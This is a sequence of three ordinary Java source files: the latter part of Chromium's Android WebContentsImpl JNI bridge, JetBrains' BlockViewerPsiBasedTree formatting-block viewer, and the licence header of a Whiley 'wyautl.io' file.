return SelectionPopupControllerImpl.fromWebContents(this);
}
@Override
public void setImportance(@ChildProcessImportance int primaryMainFrameImportance) {
checkNotDestroyed();
WebContentsImplJni.get().setImportance(
mNativeWebContentsAndroid, WebContentsImpl.this, primaryMainFrameImportance);
}
@Override
public void suspendAllMediaPlayers() {
checkNotDestroyed();
WebContentsImplJni.get().suspendAllMediaPlayers(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void setAudioMuted(boolean mute) {
checkNotDestroyed();
WebContentsImplJni.get().setAudioMuted(
mNativeWebContentsAndroid, WebContentsImpl.this, mute);
}
@Override
public boolean focusLocationBarByDefault() {
checkNotDestroyed();
return WebContentsImplJni.get().focusLocationBarByDefault(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean isFullscreenForCurrentTab() {
checkNotDestroyed();
return WebContentsImplJni.get().isFullscreenForCurrentTab(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void exitFullscreen() {
checkNotDestroyed();
WebContentsImplJni.get().exitFullscreen(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void scrollFocusedEditableNodeIntoView() {
checkNotDestroyed();
// The native side keeps track of whether the zoom and scroll actually occurred. It is
// more efficient to do it this way and sometimes fire an unnecessary message rather
// than synchronize with the renderer and always have an additional message.
WebContentsImplJni.get().scrollFocusedEditableNodeIntoView(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void selectAroundCaret(@SelectionGranularity int granularity, boolean shouldShowHandle,
boolean shouldShowContextMenu) {
checkNotDestroyed();
WebContentsImplJni.get().selectAroundCaret(mNativeWebContentsAndroid, WebContentsImpl.this,
granularity, shouldShowHandle, shouldShowContextMenu);
}
@Override
public void adjustSelectionByCharacterOffset(
int startAdjust, int endAdjust, boolean showSelectionMenu) {
WebContentsImplJni.get().adjustSelectionByCharacterOffset(mNativeWebContentsAndroid,
WebContentsImpl.this, startAdjust, endAdjust, showSelectionMenu);
}
@Override
public GURL getLastCommittedUrl() {
checkNotDestroyed();
return WebContentsImplJni.get().getLastCommittedURL(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean isIncognito() {
checkNotDestroyed();
return WebContentsImplJni.get().isIncognito(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void resumeLoadingCreatedWebContents() {
checkNotDestroyed();
WebContentsImplJni.get().resumeLoadingCreatedWebContents(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void evaluateJavaScript(String script, JavaScriptCallback callback) {
ThreadUtils.assertOnUiThread();
if (isDestroyed() || script == null) return;
WebContentsImplJni.get().evaluateJavaScript(
mNativeWebContentsAndroid, WebContentsImpl.this, script, callback);
}
@Override
@VisibleForTesting
public void evaluateJavaScriptForTests(String script, JavaScriptCallback callback) {
ThreadUtils.assertOnUiThread();
if (script == null) return;
checkNotDestroyed();
WebContentsImplJni.get().evaluateJavaScriptForTests(
mNativeWebContentsAndroid, WebContentsImpl.this, script, callback);
}
@Override
public void addMessageToDevToolsConsole(int level, String message) {
checkNotDestroyed();
WebContentsImplJni.get().addMessageToDevToolsConsole(
mNativeWebContentsAndroid, WebContentsImpl.this, level, message);
}
@Override
public void postMessageToMainFrame(
String message, String sourceOrigin, String targetOrigin, MessagePort[] ports) {
if (ports != null) {
for (MessagePort port : ports) {
if (port.isClosed() || port.isTransferred()) {
throw new IllegalStateException("Port is already closed or transferred");
}
if (port.isStarted()) {
throw new IllegalStateException("Port is already started");
}
}
}
// Treat "*" as a wildcard. Internally, a wildcard is a empty string.
if (targetOrigin.equals("*")) {
targetOrigin = "";
}
WebContentsImplJni.get().postMessageToMainFrame(mNativeWebContentsAndroid,
WebContentsImpl.this, message, sourceOrigin, targetOrigin, ports);
}
@Override
public AppWebMessagePort[] createMessageChannel()
throws IllegalStateException {
return AppWebMessagePort.createPair();
}
@Override
public boolean hasAccessedInitialDocument() {
checkNotDestroyed();
return WebContentsImplJni.get().hasAccessedInitialDocument(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@CalledByNative
private static void onEvaluateJavaScriptResult(
String jsonResult, JavaScriptCallback callback) {
callback.handleJavaScriptResult(jsonResult);
}
@Override
public int getThemeColor() {
checkNotDestroyed();
return WebContentsImplJni.get().getThemeColor(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public float getLoadProgress() {
checkNotDestroyed();
return WebContentsImplJni.get().getLoadProgress(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void requestSmartClipExtract(int x, int y, int width, int height) {
if (mSmartClipCallback == null) return;
checkNotDestroyed();
RenderCoordinatesImpl coordinateSpace = getRenderCoordinates();
float dpi = coordinateSpace.getDeviceScaleFactor();
y = y - (int) coordinateSpace.getContentOffsetYPix();
WebContentsImplJni.get().requestSmartClipExtract(mNativeWebContentsAndroid,
WebContentsImpl.this, mSmartClipCallback, (int) (x / dpi), (int) (y / dpi),
(int) (width / dpi), (int) (height / dpi));
}
@Override
public void setSmartClipResultHandler(final Handler smartClipHandler) {
if (smartClipHandler == null) {
mSmartClipCallback = null;
return;
}
mSmartClipCallback = new SmartClipCallback(smartClipHandler);
}
@CalledByNative
private static void onSmartClipDataExtracted(String text, String html, int left, int top,
int right, int bottom, SmartClipCallback callback) {
callback.onSmartClipDataExtracted(text, html, new Rect(left, top, right, bottom));
}
/**
* Requests a snapshop of accessibility tree. The result is provided asynchronously
* using the callback
* @param callback The callback to be called when the snapshot is ready. The callback
* cannot be null.
*/
public void requestAccessibilitySnapshot(ViewStructure root, Runnable doneCallback) {
checkNotDestroyed();
ViewStructureBuilder builder = ViewStructureBuilder.create(mRenderCoordinates);
WebContentsImplJni.get().requestAccessibilitySnapshot(
mNativeWebContentsAndroid, root, builder, doneCallback);
}
@VisibleForTesting
public void simulateRendererKilledForTesting(boolean wasOomProtected) {
if (mObserverProxy != null) {
mObserverProxy.renderProcessGone(wasOomProtected);
}
}
@Override
public EventForwarder getEventForwarder() {
assert mNativeWebContentsAndroid != 0;
if (mEventForwarder == null) {
checkNotDestroyed();
mEventForwarder = WebContentsImplJni.get().getOrCreateEventForwarder(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
return mEventForwarder;
}
@Override
public void addObserver(WebContentsObserver observer) {
assert mNativeWebContentsAndroid != 0;
if (mObserverProxy == null) mObserverProxy = new WebContentsObserverProxy(this);
mObserverProxy.addObserver(observer);
}
@Override
public void removeObserver(WebContentsObserver observer) {
if (mObserverProxy == null) return;
mObserverProxy.removeObserver(observer);
}
@Override
public void setOverscrollRefreshHandler(OverscrollRefreshHandler handler) {
checkNotDestroyed();
WebContentsImplJni.get().setOverscrollRefreshHandler(
mNativeWebContentsAndroid, WebContentsImpl.this, handler);
}
@Override
public void setSpatialNavigationDisabled(boolean disabled) {
checkNotDestroyed();
WebContentsImplJni.get().setSpatialNavigationDisabled(
mNativeWebContentsAndroid, WebContentsImpl.this, disabled);
}
@Override
public int downloadImage(GURL url, boolean isFavicon, int maxBitmapSize, boolean bypassCache,
ImageDownloadCallback callback) {
checkNotDestroyed();
return WebContentsImplJni.get().downloadImage(mNativeWebContentsAndroid,
WebContentsImpl.this, url, isFavicon, maxBitmapSize, bypassCache, callback);
}
@CalledByNative
private void onDownloadImageFinished(ImageDownloadCallback callback, int id, int httpStatusCode,
GURL imageUrl, List<Bitmap> bitmaps, List<Rect> sizes) {
callback.onFinishDownloadImage(id, httpStatusCode, imageUrl, bitmaps, sizes);
}
@Override
public void setHasPersistentVideo(boolean value) {
checkNotDestroyed();
WebContentsImplJni.get().setHasPersistentVideo(
mNativeWebContentsAndroid, WebContentsImpl.this, value);
}
@Override
public boolean hasActiveEffectivelyFullscreenVideo() {
checkNotDestroyed();
return WebContentsImplJni.get().hasActiveEffectivelyFullscreenVideo(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean isPictureInPictureAllowedForFullscreenVideo() {
checkNotDestroyed();
return WebContentsImplJni.get().isPictureInPictureAllowedForFullscreenVideo(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public @Nullable Rect getFullscreenVideoSize() {
checkNotDestroyed();
return WebContentsImplJni.get().getFullscreenVideoSize(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void setSize(int width, int height) {
checkNotDestroyed();
WebContentsImplJni.get().setSize(
mNativeWebContentsAndroid, WebContentsImpl.this, width, height);
}
@Override
public int getWidth() {
checkNotDestroyed();
return WebContentsImplJni.get().getWidth(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public int getHeight() {
checkNotDestroyed();
return WebContentsImplJni.get().getHeight(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@CalledByNative
private final void setMediaSession(MediaSessionImpl mediaSession) {
mMediaSession = mediaSession;
}
@CalledByNative
private static List<Bitmap> createBitmapList() {
return new ArrayList<Bitmap>();
}
@CalledByNative
private static void addToBitmapList(List<Bitmap> bitmaps, Bitmap bitmap) {
bitmaps.add(bitmap);
}
@CalledByNative
private static List<Rect> createSizeList() {
return new ArrayList<Rect>();
}
@CalledByNative
private static void createSizeAndAddToList(List<Rect> sizes, int width, int height) {
sizes.add(new Rect(0, 0, width, height));
}
@CalledByNative
private static Rect createSize(int width, int height) {
return new Rect(0, 0, width, height);
}
/**
* Returns {@link RenderCoordinatesImpl}.
*/
public RenderCoordinatesImpl getRenderCoordinates() {
return mRenderCoordinates;
}
/**
* Retrieves or stores a user data object for this WebContents.
* @param key Class instance of the object used as the key.
* @param userDataFactory Factory that creates an object of the generic class. A new object
* is created if it hasn't been created and non-null factory is given.
* @return The created or retrieved user data object. Can be null if the object was
* not created yet, or {@code userDataFactory} is null, or the internal data
* storage is already garbage-collected.
*/
public <T extends UserData> T getOrSetUserData(
Class<T> key, UserDataFactory<T> userDataFactory) {
// For tests that go without calling |initialize|.
if (!mInitialized) return null;
UserDataHost userDataHost = getUserDataHost();
// Map can be null after WebView gets gc'ed on its way to destruction.
if (userDataHost == null) {
Log.d(TAG, "UserDataHost can't be found");
return null;
}
T data = userDataHost.getUserData(key);
if (data == null && userDataFactory != null) {
assert userDataHost.getUserData(key) == null; // Do not allow overwriting
T object = userDataFactory.create(this);
assert key.isInstance(object);
// Retrieves from the map again to return null in case |setUserData| fails
// to store the object.
data = userDataHost.setUserData(key, object);
}
return key.cast(data);
}
public <T extends UserData> void removeUserData(Class<T> key) {
UserDataHost userDataHost = getUserDataHost();
if (userDataHost == null) return;
userDataHost.removeUserData(key);
}
/**
* @return {@code UserDataHost} that contains internal user data. {@code null} if
* it is already gc'ed.
*/
private UserDataHost getUserDataHost() {
if (mInternalsHolder == null) return null;
WebContentsInternals internals = mInternalsHolder.get();
if (internals == null) return null;
return ((WebContentsInternalsImpl) internals).userDataHost;
}
// WindowEventObserver
@Override
public void onRotationChanged(int rotation) {
if (mNativeWebContentsAndroid == 0) return;
int rotationDegrees = 0;
switch (rotation) {
case Surface.ROTATION_0:
rotationDegrees = 0;
break;
case Surface.ROTATION_90:
rotationDegrees = 90;
break;
case Surface.ROTATION_180:
rotationDegrees = 180;
break;
case Surface.ROTATION_270:
rotationDegrees = -90;
break;
default:
throw new IllegalStateException(
"Display.getRotation() shouldn't return that value");
}
WebContentsImplJni.get().sendOrientationChangeEvent(
mNativeWebContentsAndroid, WebContentsImpl.this, rotationDegrees);
}
@Override
public void onDIPScaleChanged(float dipScale) {
if (mNativeWebContentsAndroid == 0) return;
mRenderCoordinates.setDeviceScaleFactor(dipScale);
WebContentsImplJni.get().onScaleFactorChanged(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void setFocus(boolean hasFocus) {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().setFocus(
mNativeWebContentsAndroid, WebContentsImpl.this, hasFocus);
}
@Override
public void setDisplayCutoutSafeArea(Rect insets) {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().setDisplayCutoutSafeArea(mNativeWebContentsAndroid,
WebContentsImpl.this, insets.top, insets.left, insets.bottom, insets.right);
}
@Override
public void notifyRendererPreferenceUpdate() {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().notifyRendererPreferenceUpdate(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void notifyBrowserControlsHeightChanged() {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().notifyBrowserControlsHeightChanged(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
private void checkNotDestroyed() {
if (mNativeWebContentsAndroid != 0) return;
throw new IllegalStateException(
"Native WebContents already destroyed", mNativeDestroyThrowable);
}
@NativeMethods
interface Natives {
// This is static to avoid exposing a public destroy method on the native side of this
// class.
void destroyWebContents(long webContentsAndroidPtr);
WebContents fromNativePtr(long webContentsAndroidPtr);
void clearNativeReference(long nativeWebContentsAndroid, WebContentsImpl caller);
WindowAndroid getTopLevelNativeWindow(
long nativeWebContentsAndroid, WebContentsImpl caller);
void setTopLevelNativeWindow(
long nativeWebContentsAndroid, WebContentsImpl caller, WindowAndroid windowAndroid);
RenderFrameHost getMainFrame(long nativeWebContentsAndroid, WebContentsImpl caller);
RenderFrameHost getFocusedFrame(long nativeWebContentsAndroid, WebContentsImpl caller);
RenderFrameHost getRenderFrameHostFromId(
long nativeWebContentsAndroid, int renderProcessId, int renderFrameId);
RenderFrameHost[] getAllRenderFrameHosts(
long nativeWebContentsAndroid, WebContentsImpl caller);
RenderWidgetHostViewImpl getRenderWidgetHostView(
long nativeWebContentsAndroid, WebContentsImpl caller);
WebContentsImpl[] getInnerWebContents(
long nativeWebContentsAndroid, WebContentsImpl caller);
@Visibility
int getVisibility(long nativeWebContentsAndroid);
String getTitle(long nativeWebContentsAndroid, WebContentsImpl caller);
GURL getVisibleURL(long nativeWebContentsAndroid, WebContentsImpl caller);
String getEncoding(long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isLoading(long nativeWebContentsAndroid, WebContentsImpl caller);
boolean shouldShowLoadingUI(long nativeWebContentsAndroid, WebContentsImpl caller);
void dispatchBeforeUnload(
long nativeWebContentsAndroid, WebContentsImpl caller, boolean autoCancel);
void stop(long nativeWebContentsAndroid, WebContentsImpl caller);
void cut(long nativeWebContentsAndroid, WebContentsImpl caller);
void copy(long nativeWebContentsAndroid, WebContentsImpl caller);
void paste(long nativeWebContentsAndroid, WebContentsImpl caller);
void pasteAsPlainText(long nativeWebContentsAndroid, WebContentsImpl caller);
void replace(long nativeWebContentsAndroid, WebContentsImpl caller, String word);
void selectAll(long nativeWebContentsAndroid, WebContentsImpl caller);
void collapseSelection(long nativeWebContentsAndroid, WebContentsImpl caller);
void onHide(long nativeWebContentsAndroid, WebContentsImpl caller);
void onShow(long nativeWebContentsAndroid, WebContentsImpl caller);
void setImportance(long nativeWebContentsAndroid, WebContentsImpl caller, int importance);
void suspendAllMediaPlayers(long nativeWebContentsAndroid, WebContentsImpl caller);
void setAudioMuted(long nativeWebContentsAndroid, WebContentsImpl caller, boolean mute);
boolean focusLocationBarByDefault(long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isFullscreenForCurrentTab(long nativeWebContentsAndroid, WebContentsImpl caller);
void exitFullscreen(long nativeWebContentsAndroid, WebContentsImpl caller);
void scrollFocusedEditableNodeIntoView(
long nativeWebContentsAndroid, WebContentsImpl caller);
void selectAroundCaret(long nativeWebContentsAndroid, WebContentsImpl caller,
int granularity, boolean shouldShowHandle, boolean shouldShowContextMenu);
void adjustSelectionByCharacterOffset(long nativeWebContentsAndroid, WebContentsImpl caller,
int startAdjust, int endAdjust, boolean showSelectionMenu);
GURL getLastCommittedURL(long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isIncognito(long nativeWebContentsAndroid, WebContentsImpl caller);
void resumeLoadingCreatedWebContents(long nativeWebContentsAndroid, WebContentsImpl caller);
void evaluateJavaScript(long nativeWebContentsAndroid, WebContentsImpl caller,
String script, JavaScriptCallback callback);
void evaluateJavaScriptForTests(long nativeWebContentsAndroid, WebContentsImpl caller,
String script, JavaScriptCallback callback);
void addMessageToDevToolsConsole(
long nativeWebContentsAndroid, WebContentsImpl caller, int level, String message);
void postMessageToMainFrame(long nativeWebContentsAndroid, WebContentsImpl caller,
String message, String sourceOrigin, String targetOrigin, MessagePort[] ports);
boolean hasAccessedInitialDocument(long nativeWebContentsAndroid, WebContentsImpl caller);
int getThemeColor(long nativeWebContentsAndroid, WebContentsImpl caller);
float getLoadProgress(long nativeWebContentsAndroid, WebContentsImpl caller);
void requestSmartClipExtract(long nativeWebContentsAndroid, WebContentsImpl caller,
SmartClipCallback callback, int x, int y, int width, int height);
void requestAccessibilitySnapshot(long nativeWebContentsAndroid,
ViewStructure viewStructureRoot, ViewStructureBuilder viewStructureBuilder,
Runnable doneCallback);
void setOverscrollRefreshHandler(long nativeWebContentsAndroid, WebContentsImpl caller,
OverscrollRefreshHandler nativeOverscrollRefreshHandler);
void setSpatialNavigationDisabled(
long nativeWebContentsAndroid, WebContentsImpl caller, boolean disabled);
int downloadImage(long nativeWebContentsAndroid, WebContentsImpl caller, GURL url,
boolean isFavicon, int maxBitmapSize, boolean bypassCache,
ImageDownloadCallback callback);
void setHasPersistentVideo(
long nativeWebContentsAndroid, WebContentsImpl caller, boolean value);
boolean hasActiveEffectivelyFullscreenVideo(
long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isPictureInPictureAllowedForFullscreenVideo(
long nativeWebContentsAndroid, WebContentsImpl caller);
Rect getFullscreenVideoSize(long nativeWebContentsAndroid, WebContentsImpl caller);
void setSize(long nativeWebContentsAndroid, WebContentsImpl caller, int width, int height);
int getWidth(long nativeWebContentsAndroid, WebContentsImpl caller);
int getHeight(long nativeWebContentsAndroid, WebContentsImpl caller);
EventForwarder getOrCreateEventForwarder(
long nativeWebContentsAndroid, WebContentsImpl caller);
void setViewAndroidDelegate(long nativeWebContentsAndroid, WebContentsImpl caller,
ViewAndroidDelegate viewDelegate);
void sendOrientationChangeEvent(
long nativeWebContentsAndroid, WebContentsImpl caller, int orientation);
void onScaleFactorChanged(long nativeWebContentsAndroid, WebContentsImpl caller);
void setFocus(long nativeWebContentsAndroid, WebContentsImpl caller, boolean focused);
void setDisplayCutoutSafeArea(long nativeWebContentsAndroid, WebContentsImpl caller,
int top, int left, int bottom, int right);
void notifyRendererPreferenceUpdate(long nativeWebContentsAndroid, WebContentsImpl caller);
void notifyBrowserControlsHeightChanged(
long nativeWebContentsAndroid, WebContentsImpl caller);
boolean isBeingDestroyed(long nativeWebContentsAndroid, WebContentsImpl caller);
}
}
|
|
/*
* Copyright 2000-2017 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.internal.psiView.formattingblocks;
import com.intellij.diagnostic.AttachmentFactory;
import com.intellij.diagnostic.LogMessageEx;
import com.intellij.formatting.ASTBlock;
import com.intellij.formatting.Block;
import com.intellij.formatting.FormattingModel;
import com.intellij.formatting.FormattingModelBuilder;
import com.intellij.ide.util.treeView.AbstractTreeStructure;
import com.intellij.internal.psiView.PsiViewerDialog;
import com.intellij.internal.psiView.ViewerPsiBasedTree;
import com.intellij.lang.ASTNode;
import com.intellij.lang.LanguageFormatting;
import com.intellij.lang.injection.InjectedLanguageManager;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.util.Disposer;
import com.intellij.openapi.util.TextRange;
import com.intellij.openapi.wm.IdeFocusManager;
import com.intellij.psi.PsiElement;
import com.intellij.psi.PsiFile;
import com.intellij.psi.codeStyle.CodeStyleSettings;
import com.intellij.psi.codeStyle.CodeStyleSettingsManager;
import com.intellij.psi.impl.source.tree.injected.InjectedLanguageUtil;
import com.intellij.ui.IdeBorderFactory;
import com.intellij.ui.ScrollPaneFactory;
import com.intellij.ui.treeStructure.Tree;
import com.intellij.util.ObjectUtils;
import com.intellij.util.containers.ContainerUtil;
import com.intellij.util.containers.JBIterable;
import com.intellij.util.containers.JBTreeTraverser;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.*;
import javax.swing.event.TreeSelectionEvent;
import javax.swing.event.TreeSelectionListener;
import javax.swing.tree.DefaultMutableTreeNode;
import javax.swing.tree.DefaultTreeModel;
import java.awt.*;
import java.util.HashMap;
import java.util.Set;
import static com.intellij.internal.psiView.PsiViewerDialog.initTree;
public class BlockViewerPsiBasedTree implements ViewerPsiBasedTree {
@NotNull
private final JPanel myBlockStructurePanel;
@Nullable
private BlockTreeBuilder myBlockTreeBuilder;
@NotNull
private final Tree myBlockTree;
@NotNull
private final Project myProject;
@NotNull
private final PsiTreeUpdater myUpdater;
private int myIgnoreBlockTreeSelectionMarker = 0;
@Nullable
private volatile HashMap<PsiElement, BlockTreeNode> myPsiToBlockMap;
public BlockViewerPsiBasedTree(@NotNull Project project, @NotNull PsiTreeUpdater updater) {
myProject = project;
myUpdater = updater;
myBlockTree = new Tree(new DefaultTreeModel(new DefaultMutableTreeNode()));
myBlockStructurePanel = new JPanel(new BorderLayout());
myBlockStructurePanel.add(ScrollPaneFactory.createScrollPane(myBlockTree));
myBlockStructurePanel.setBorder(IdeBorderFactory.createBorder());
initTree(myBlockTree);
}
@Override
public void reloadTree(@Nullable PsiElement rootRootElement, @NotNull String text) {
resetBlockTree();
buildBlockTree(rootRootElement);
}
@Override
public void selectNodeFromPsi(@Nullable PsiElement element) {
if (myBlockTreeBuilder != null && element != null) {
BlockTreeNode currentBlockNode = findBlockNode(element);
if (currentBlockNode != null) {
selectBlockNode(currentBlockNode);
}
}
}
@NotNull
@Override
public JComponent getComponent() {
return myBlockStructurePanel;
}
@Override
public boolean isFocusOwner() {
return myBlockTree.isFocusOwner();
}
@Override
public void focusTree() {
IdeFocusManager.getInstance(myProject).requestFocus(myBlockTree, true);
}
@Override
public void dispose() {
resetBlockTree();
}
private void resetBlockTree() {
myBlockTree.removeAll();
if (myBlockTreeBuilder != null) {
Disposer.dispose(myBlockTreeBuilder);
myBlockTreeBuilder = null;
}
myPsiToBlockMap = null;
ViewerPsiBasedTree.removeListenerOfClass(myBlockTree, BlockTreeSelectionListener.class);
}
private void buildBlockTree(@Nullable PsiElement rootElement) {
Block rootBlock = rootElement == null ? null : buildBlocks(rootElement);
if (rootBlock == null) {
myBlockTreeBuilder = null;
myBlockTree.setRootVisible(false);
myBlockTree.setVisible(false);
return;
}
myBlockTree.setVisible(true);
BlockTreeStructure blockTreeStructure = new BlockTreeStructure();
BlockTreeNode rootNode = new BlockTreeNode(rootBlock, null);
blockTreeStructure.setRoot(rootNode);
myBlockTreeBuilder = new BlockTreeBuilder(myBlockTree, blockTreeStructure);
initMap(rootNode, rootElement);
assert myPsiToBlockMap != null;
PsiElement rootPsi = rootNode.getBlock() instanceof ASTBlock ?
((ASTBlock)rootNode.getBlock()).getNode().getPsi() : rootElement;
BlockTreeNode blockNode = myPsiToBlockMap.get(rootPsi);
if (blockNode == null) {
PsiViewerDialog.LOG.error(LogMessageEx
.createEvent("PsiViewer: rootNode not found",
"Current language: " + rootElement.getContainingFile().getLanguage(),
AttachmentFactory
.createAttachment(rootElement.getContainingFile().getOriginalFile().getVirtualFile())));
blockNode = findBlockNode(rootPsi);
}
blockTreeStructure.setRoot(blockNode);
myBlockTree.addTreeSelectionListener(new BlockTreeSelectionListener(rootElement));
myBlockTree.setRootVisible(true);
myBlockTree.expandRow(0);
myBlockTreeBuilder.queueUpdate();
}
@Nullable
private BlockTreeNode findBlockNode(PsiElement element) {
HashMap<PsiElement, BlockTreeNode> psiToBlockMap = myPsiToBlockMap;
BlockTreeNode result = psiToBlockMap == null ? null : psiToBlockMap.get(element);
if (result == null) {
TextRange rangeInHostFile = InjectedLanguageManager.getInstance(myProject).injectedToHost(element, element.getTextRange());
result = findBlockNode(rangeInHostFile);
}
return result;
}
private void selectBlockNode(@Nullable BlockTreeNode currentBlockNode) {
if (myBlockTreeBuilder == null) return;
if (currentBlockNode != null) {
myIgnoreBlockTreeSelectionMarker++;
myBlockTreeBuilder.select(currentBlockNode, () -> {
// hope this is always called!
assert myIgnoreBlockTreeSelectionMarker > 0;
myIgnoreBlockTreeSelectionMarker--;
});
}
else {
myIgnoreBlockTreeSelectionMarker++;
try {
myBlockTree.getSelectionModel().clearSelection();
}
finally {
assert myIgnoreBlockTreeSelectionMarker > 0;
myIgnoreBlockTreeSelectionMarker--;
}
}
}
public class BlockTreeSelectionListener implements TreeSelectionListener {
@NotNull
private PsiElement myRootElement;
public BlockTreeSelectionListener(@NotNull PsiElement rootElement) {
myRootElement = rootElement;
}
@Override
public void valueChanged(@NotNull TreeSelectionEvent e) {
if (myIgnoreBlockTreeSelectionMarker > 0 || myBlockTreeBuilder == null) {
return;
}
Set<?> blockElementsSet = myBlockTreeBuilder.getSelectedElements();
Object item = ContainerUtil.getFirstItem(blockElementsSet);
if (!(item instanceof BlockTreeNode)) return;
BlockTreeNode descriptor = (BlockTreeNode)item;
PsiElement rootPsi = myRootElement;
int blockStart = descriptor.getBlock().getTextRange().getStartOffset();
PsiFile file = rootPsi.getContainingFile();
PsiElement currentPsiEl = InjectedLanguageUtil.findElementAtNoCommit(file, blockStart);
if (currentPsiEl == null) currentPsiEl = file;
int blockLength = descriptor.getBlock().getTextRange().getLength();
while (currentPsiEl.getParent() != null &&
currentPsiEl.getTextRange().getStartOffset() == blockStart &&
currentPsiEl.getTextLength() != blockLength) {
currentPsiEl = currentPsiEl.getParent();
}
final BlockTreeStructure treeStructure = ObjectUtils.notNull((BlockTreeStructure)myBlockTreeBuilder.getTreeStructure());
BlockTreeNode rootBlockNode = treeStructure.getRootElement();
int baseOffset = 0;
if (rootBlockNode != null) {
baseOffset = rootBlockNode.getBlock().getTextRange().getStartOffset();
}
TextRange range = descriptor.getBlock().getTextRange();
range = range.shiftRight(-baseOffset);
myUpdater.updatePsiTree(currentPsiEl, myBlockTree.hasFocus() ? range : null);
}
}
@Nullable
private BlockTreeNode findBlockNode(TextRange range) {
final BlockTreeBuilder builder = myBlockTreeBuilder;
if (builder == null || !myBlockStructurePanel.isVisible()) {
return null;
}
AbstractTreeStructure treeStructure = builder.getTreeStructure();
if (treeStructure == null) return null;
BlockTreeNode node = (BlockTreeNode)treeStructure.getRootElement();
main_loop:
while (true) {
if (node.getBlock().getTextRange().equals(range)) {
return node;
}
for (BlockTreeNode child : node.getChildren()) {
if (child.getBlock().getTextRange().contains(range)) {
node = child;
continue main_loop;
}
}
return node;
}
}
@Nullable
private static Block buildBlocks(@NotNull PsiElement rootElement) {
FormattingModelBuilder formattingModelBuilder = LanguageFormatting.INSTANCE.forContext(rootElement);
CodeStyleSettings settings = CodeStyleSettingsManager.getSettings(rootElement.getProject());
if (formattingModelBuilder != null) {
FormattingModel formattingModel = formattingModelBuilder.createModel(rootElement, settings);
return formattingModel.getRootBlock();
}
else {
return null;
}
}
private void initMap(BlockTreeNode rootBlockNode, PsiElement psiEl) {
myPsiToBlockMap = new HashMap<>();
JBTreeTraverser<BlockTreeNode> traverser = new JBTreeTraverser<>(o -> JBIterable.of(o.getChildren()));
for (BlockTreeNode block : traverser.withRoot(rootBlockNode)) {
PsiElement currentElem = null;
if (block.getBlock() instanceof ASTBlock) {
ASTNode node = ((ASTBlock)block.getBlock()).getNode();
if (node != null) {
currentElem = node.getPsi();
}
}
if (currentElem == null) {
currentElem =
InjectedLanguageUtil
.findElementAtNoCommit(psiEl.getContainingFile(), block.getBlock().getTextRange().getStartOffset());
}
myPsiToBlockMap.put(currentElem, block);
//nested PSI elements with same ranges will be mapped to one blockNode
// assert currentElem != null; //for Scala-language plugin etc it can be null, because formatterBlocks is not instance of ASTBlock
TextRange curTextRange = currentElem.getTextRange();
PsiElement parentElem = currentElem.getParent();
while (parentElem != null && parentElem.getTextRange().equals(curTextRange)) {
myPsiToBlockMap.put(parentElem, block);
parentElem = parentElem.getParent();
}
}
}
}
|
|
// Copyright (c) 2011, David J. Pearce ([email protected])
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above copyright
// notice, this list of conditions and the following disclaimer in the
// documentation and/or other materials provided with the distribution.
// * Neither the name of the <organization> nor the
// names of its contributors may be used to endorse or promote products
// derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
// ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
// WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
// DISCLAIMED. IN NO EVENT SHALL DAVID J. PEARCE BE LIABLE FOR ANY
// DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
// LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
// ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
// SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
package wyautl.io;
